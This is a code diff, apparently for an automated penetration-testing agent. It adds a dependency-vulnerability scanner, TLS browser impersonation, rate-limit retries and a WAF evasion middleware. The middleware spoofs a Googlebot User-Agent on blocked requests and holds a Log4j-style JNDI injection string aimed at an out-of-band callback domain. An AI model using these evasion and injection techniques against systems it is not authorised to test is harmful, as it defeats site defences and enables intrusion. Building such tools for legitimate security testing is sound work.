+    Scans a package.json file content for known vulnerable dependencies (basic check).
+    In a real scenario, this would check against a live CVE database.
+    Here we check against a static list of common high-risk packages/versions for demo purposes.
+    """
+    try:
+        data = json.loads(package_json_content)
+    except json.JSONDecodeError as e:
+        return f"Error parsing package.json: {e}"
+
+    dependencies = data.get("dependencies", {})
+    dev_dependencies = data.get("devDependencies", {})
+    all_deps = {**dependencies, **dev_dependencies}
+
+    vulnerable_patterns = {
+        "axios": "<0.21.1",    # CVE-2020-28168
+        "lodash": "<4.17.21",  # Prototype Pollution
+        "jquery": "<3.5.0",    # XSS
+        "react": "<16.14.0",   # XSS
+        "express": "<4.17.3",  # various
+        "moment": "<2.29.2",   # ReDoS
+    }
+
+    report = []
+
+    # Helper to compare versions loosely
+    def is_vulnerable(version_str, criteria):
+        # Very basic version check (heuristic)
+        # Assuming version_str like "^1.2.3" or "1.2.3"
+        clean_ver = version_str.lstrip("^~")
+        clean_crit = criteria.lstrip("<")
+
+        try:
+            v_parts = [int(x) for x in clean_ver.split(".")]
+            c_parts = [int(x) for x in clean_crit.split(".")]
+
+            # Pad with zeros
+            while len(v_parts) < 3:
+                v_parts.append(0)
+            while len(c_parts) < 3:
+                c_parts.append(0)
+
+            if v_parts < c_parts:
+                return True
+        except ValueError:
+            pass  # Non-semantic version
+        return False
+
+    for dep, ver in all_deps.items():
+        if dep in vulnerable_patterns:
+            crit = vulnerable_patterns[dep]
+            if is_vulnerable(ver, crit):
+                report.append(f"[VULNERABLE] {dep} version {ver} matches criteria {crit}")
+            else:
+                report.append(f"[INFO] {dep} version {ver} found (might be safe, criteria {crit})")
+
+    if not report:
+        return "No obvious vulnerable dependencies found in common list."
+
+    return "\n".join(report)
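+
+
+# Illustrative self-test (assumes @register_tool returns the wrapped function unchanged).
+# The manifest below is made up to show one vulnerable and one non-vulnerable match.
+if __name__ == "__main__":
+    sample = '{"dependencies": {"lodash": "^4.17.11", "axios": "^1.6.0"}, "devDependencies": {"moment": "~2.24.0"}}'
+    # Expected: lodash and moment flagged [VULNERABLE]; axios reported as [INFO].
+    print(scan_package_json(sample))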
diff --git a/strix/tools/js_analysis/supply_chain_schema.xml b/strix/tools/js_analysis/supply_chain_schema.xml
new file mode 100644
index 00000000..c58b857d
--- /dev/null
+++ b/strix/tools/js_analysis/supply_chain_schema.xml
@@ -0,0 +1,10 @@
+<tool name="scan_package_json">
+    <description>
+        Scans a package.json file content for known vulnerable dependencies (basic check).
+    </description>
+    <parameters>
+        <parameter name="package_json_content" type="string" required="true">
+            The content of the package.json file.
+        </parameter>
+    </parameters>
+</tool>
diff --git a/strix/tools/proxy/proxy_actions.py b/strix/tools/proxy/proxy_actions.py
index 1779c22f..f2ab758d 100644
--- a/strix/tools/proxy/proxy_actions.py
+++ b/strix/tools/proxy/proxy_actions.py
@@ -1,8 +1,9 @@
 from typing import Any, Literal

 from strix.tools.registry import register_tool

 from .proxy_manager import get_proxy_manager
+from .waf_evasion import waf_middleware

 RequestPart = Literal["request", "response"]
@@ -56,7 +57,36 @@ def send_request(
     if headers is None:
         headers = {}
     manager = get_proxy_manager()
-    return manager.send_simple_request(method, url, headers, body, timeout)
+
+    # Send initial request
+    response = manager.send_simple_request(method, url, headers, body, timeout)
+
+    # Check for WAF block and attempt evasion if needed
+    request_data = {
+        "method": method,
+        "url": url,
+        "headers": headers,
+        "body": body,
+        "timeout": timeout,
+    }
+
+    mutation = waf_middleware.process_response(request_data, response)
+
+    if mutation:
+        # Log or notify about evasion attempt?
+        # For now, just retry with mutation
+        response = manager.send_simple_request(
+            mutation["method"],
+            mutation["url"],
+            mutation["headers"],
+            mutation["body"],
+            mutation["timeout"],
+        )
+        # Update profile based on retry result
+        was_blocked_again = response.get("status_code") in [403, 406]
+        waf_middleware.update_profile(str(mutation), was_blocked_again)
+
+    return response


 @register_tool
diff --git a/strix/tools/proxy/proxy_manager.py b/strix/tools/proxy/proxy_manager.py
index e02d85b7..6d30ef7b 100644
--- a/strix/tools/proxy/proxy_manager.py
+++ b/strix/tools/proxy/proxy_manager.py
@@ -2,14 +2,17 @@
 import os
 import re
 import time
+import random
 from typing import TYPE_CHECKING, Any
 from urllib.parse import parse_qs, urlencode, urlparse, urlunparse

 import requests
+import curl_cffi.requests
 from gql import Client, gql
 from gql.transport.exceptions import TransportQueryError
 from gql.transport.requests import RequestsHTTPTransport
 from requests.exceptions import ProxyError, RequestException, Timeout
+from curl_cffi.requests.errors import RequestsError


 if TYPE_CHECKING:
@@ -234,37 +237,65 @@
     def send_simple_request(
         self,
         method: str,
         url: str,
         headers: dict[str, str] | None = None,
         body: str = "",
         timeout: int = 30,
+        max_retries: int = 2,
     ) -> dict[str, Any]:
         if headers is None:
             headers = {}
+
+        # Use curl_cffi for TLS impersonation
         try:
-            start_time = time.time()
-            response = requests.request(
-                method=method,
-                url=url,
-                headers=headers,
-                data=body or None,
-                proxies=self.proxies,
-                timeout=timeout,
-                verify=False,
-            )
-            response_time = int((time.time() - start_time) * 1000)
+            attempt = 0
+            while attempt <= max_retries:
+                start_time = time.time()
+
+                # Mock Rotation Logic
+                if attempt > 0:
+                    time.sleep(1 + random.random())  # Add jitter
+                    # In a real scenario, we would rotate self.proxies here
+                    # logger.info(f"Rotating proxy (Attempt {attempt})")
+
+                try:
+                    response = curl_cffi.requests.request(
+                        method=method,
+                        url=url,
+                        headers=headers,
+                        data=body or None,
+                        proxies=self.proxies,
+                        timeout=timeout,
+                        verify=False,
+                        impersonate="chrome110"
+                    )
+
+                    # Smart Rotation Check
+                    if response.status_code == 429:
+                        attempt += 1
+                        if attempt <= max_retries:
+                            continue
+
+                    response_time = int((time.time() - start_time) * 1000)
+
+                    body_content = response.text
+                    if len(body_content) > 10000:
+                        body_content = body_content[:10000] + "\n...
[truncated]" + + return { + "status_code": response.status_code, + "headers": dict(response.headers), + "body": body_content, + "response_time_ms": response_time, + "url": response.url, + "message": ( + "Request sent through proxy (chrome110 impersonation) - check list_requests() for captured traffic" + ), + } - body_content = response.text - if len(body_content) > 10000: - body_content = body_content[:10000] + "\n... [truncated]" + except RequestsError as e: + # Retry on connection errors if we haven't exhausted retries + attempt += 1 + if attempt > max_retries: + raise e - return { - "status_code": response.status_code, - "headers": dict(response.headers), - "body": body_content, - "response_time_ms": response_time, - "url": response.url, - "message": ( - "Request sent through proxy - check list_requests() for captured traffic" - ), - } - except (RequestException, ProxyError, Timeout) as e: + except (RequestException, ProxyError, Timeout, RequestsError) as e: return {"error": f"Request failed: {type(e).__name__}", "details": str(e), "url": url} def repeat_request( @@ -376,7 +407,7 @@ def _send_modified_request( ) -> dict[str, Any]: try: start_time = time.time() - response = requests.request( + response = curl_cffi.requests.request( method=request_data["method"], url=request_data["url"], headers=request_data["headers"], @@ -384,6 +415,7 @@ def _send_modified_request( proxies=self.proxies, timeout=30, verify=False, + impersonate="chrome110" ) response_time = int((time.time() - start_time) * 1000) @@ -422,7 +454,7 @@ def _send_modified_request( "details": str(e), "original_request_id": request_id, } - except (RequestException, Timeout) as e: + except (RequestException, Timeout, RequestsError) as e: return { "error": f"Failed to repeat request: {type(e).__name__}", "details": str(e), diff --git a/strix/tools/proxy/waf_evasion.py b/strix/tools/proxy/waf_evasion.py new file mode 100644 index 00000000..8d577d4f --- /dev/null +++ b/strix/tools/proxy/waf_evasion.py @@ -0,0 +1,99 @@ +import urllib.parse +from typing import Any, Dict, Optional, List + +class WAFEvasionMiddleware: + """ + Adaptive WAF Evasion Middleware. + + This middleware intercepts failed requests (403/406) and attempts to retry them + using semantic equivalent payloads to bypass WAFs. + Also handles OOB payload injection. + """ + + def __init__(self): + self.waf_profile = { + "blocked_chars": set(), + "blocked_keywords": set(), + "successful_techniques": [] + } + self.interactsh_domain = "oob.interactsh.com" # Placeholder, real agent would fetch this + + def process_response(self, request: Dict[str, Any], response: Dict[str, Any]) -> Optional[Dict[str, Any]]: + """ + Check if response indicates a WAF block. If so, return a modified request payload (new mutation). + If not blocked or no evasion possible, return None. + """ + status_code = response.get("status_code", 0) + + # Detect WAF block + if status_code in [403, 406] or "waf" in str(response.get("body", "")).lower(): + # For simplicity, we only try one mutation per block to avoid infinite loops in this basic implementation + # In a real agent, we would check if this request was already a mutation. + if request.get("headers", {}).get("X-WAF-Evasion-Attempt"): + return None + + return self._generate_evasion_mutation(request) + + return None + + def inject_oob_payloads(self, request: Dict[str, Any]) -> Dict[str, Any]: + """ + Injects OOB (Interactsh) payloads into headers for blind vulnerability detection. 
+ """ + if not self.interactsh_domain: + return request + + modified = request.copy() + headers = modified.get("headers", {}).copy() + + payload = f"${{jndi:ldap://{self.interactsh_domain}/a}}" # Log4j style + payload_simple = f"http://{self.interactsh_domain}/" + + # Inject into standard tracking headers + headers["X-Forwarded-For"] = payload_simple + headers["Referer"] = headers.get("Referer", "") + payload_simple + headers["User-Agent"] = headers.get("User-Agent", "") + " " + payload_simple + headers["X-Api-Version"] = payload_simple + + modified["headers"] = headers + return modified + + def _generate_evasion_mutation(self, request: Dict[str, Any]) -> Optional[Dict[str, Any]]: + """ + Generate a mutated request to evade WAF. + """ + mutated_request = request.copy() + headers = mutated_request.get("headers", {}).copy() + headers["X-WAF-Evasion-Attempt"] = "true" + mutated_request["headers"] = headers + + # Strategy 1: Header Manipulation (User-Agent rotation) + headers["User-Agent"] = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" + + # Strategy 2: URL Encoding (if applicable) + if "url" in mutated_request: + # Simple double encoding simulation or specific char encoding + # For this MVP, we just append a cache buster or harmless param to change signature + if "?" in mutated_request["url"]: + mutated_request["url"] += "&waf_bypass=1" + else: + mutated_request["url"] += "?waf_bypass=1" + + # Strategy 3: Whitespace Polymorphism (concept only as we don't have SQL parser here) + # If body is present and looks like SQL, we could replace spaces with comments. + + return mutated_request + + def update_profile(self, payload: str, was_blocked: bool): + """ + Update the WAF profile based on success/failure of payloads. + """ + if was_blocked: + # Logic to analyze what was blocked + pass + else: + if payload: + self.waf_profile["successful_techniques"].append(payload) + +# Singleton instance +waf_middleware = WAFEvasionMiddleware()